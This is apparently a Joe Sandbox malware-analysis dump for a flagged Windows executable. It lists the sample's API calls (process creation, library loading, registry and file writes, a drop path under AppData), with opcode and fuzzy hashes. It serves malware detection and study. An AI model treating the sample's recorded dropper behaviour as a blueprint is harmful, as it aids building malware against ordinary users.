                                                                            • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                                                            • Opcode Fuzzy Hash: 009c69f53e9950683efb76fdc5a6e8cdc372d449b4d3b3bde035592a44acf5fc
                                                                            • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: b8454ca33cf51575de2547d3164565982b70b773dc2d1b9c3ff8f16f5a6c27f1
                                                                            • Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
                                                                            • Opcode Fuzzy Hash: b8454ca33cf51575de2547d3164565982b70b773dc2d1b9c3ff8f16f5a6c27f1
                                                                            • Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                                              • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                                                              • Part of subcall function 004065B6: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                            • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                                                            • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                            • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                            • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
                                                                            • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                            • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                            • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                                                            • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                            • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                                                            APIs
                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileMove
                                                                            • String ID:
                                                                            • API String ID: 3562171763-0
                                                                            • Opcode ID: f7dd985994354922a31a73053084a1032987b0bc5b579566ae0dfe4bf6eb674a
                                                                            • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
                                                                            • Opcode Fuzzy Hash: f7dd985994354922a31a73053084a1032987b0bc5b579566ae0dfe4bf6eb674a
                                                                            • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
                                                                            APIs
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                            • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                            • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                            • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                            • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                            • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                            • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                            • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                            • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                            • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                                                            APIs
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID:
                                                                            • API String ID: 1096422788-0
                                                                            • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                            • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                            • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                            • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,: Completed,?), ref: 004060DD
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                            • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                            • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: fa9329c38297884b38737862244368f77318cb6715222e6553afc9fa3614b21f
                                                                            • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                                                            • Opcode Fuzzy Hash: fa9329c38297884b38737862244368f77318cb6715222e6553afc9fa3614b21f
                                                                            • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            APIs
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(fusionsenergiens,00403233,00403233,fusionsenergiens,00000000,00410EA0,00403094), ref: 0040530B
                                                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(fusionsenergiens,fusionsenergiens), ref: 0040531D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              • Part of subcall function 00405831: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                              • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                              • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                                                              • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                                                              • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                                                            • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                                            • DeleteObject.GDI32(00000000), ref: 00404D22
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                                            • GlobalFree.KERNEL32(?), ref: 0040505C
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                                            • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                                                            • ShowWindow.USER32(00000000), ref: 0040520D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004046FF
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                                                            • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404817
                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404823
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835
                                                                              • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                                                              • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                                              • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                                              • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                                                              • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                                            • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                                                              • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                                              • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                                                              • Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales$6B
                                                                            • API String ID: 2624150263-759560206
                                                                            • Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                                            • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                                                            • Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                                            • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                                            • GetSysColor.USER32(?), ref: 0040445E
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                                            • lstrlenW.KERNEL32(?), ref: 0040447F
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                                                            • SendMessageW.USER32(00000000), ref: 00404501
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                                                            • SetCursor.USER32(00000000), ref: 00404580
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                                                            • SetCursor.USER32(00000000), ref: 0040459C
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: : Completed$N
                                                                            • API String ID: 3103080414-2140067464
                                                                            • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                            • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                                            • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                            • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                            • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                            • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                            • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                                                            • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
                                                                              • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                              • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                            • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
                                                                            • wsprintfA.USER32 ref: 00405F17
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406000
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                                                              • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                              • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                                            • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                                                            • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                                            • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
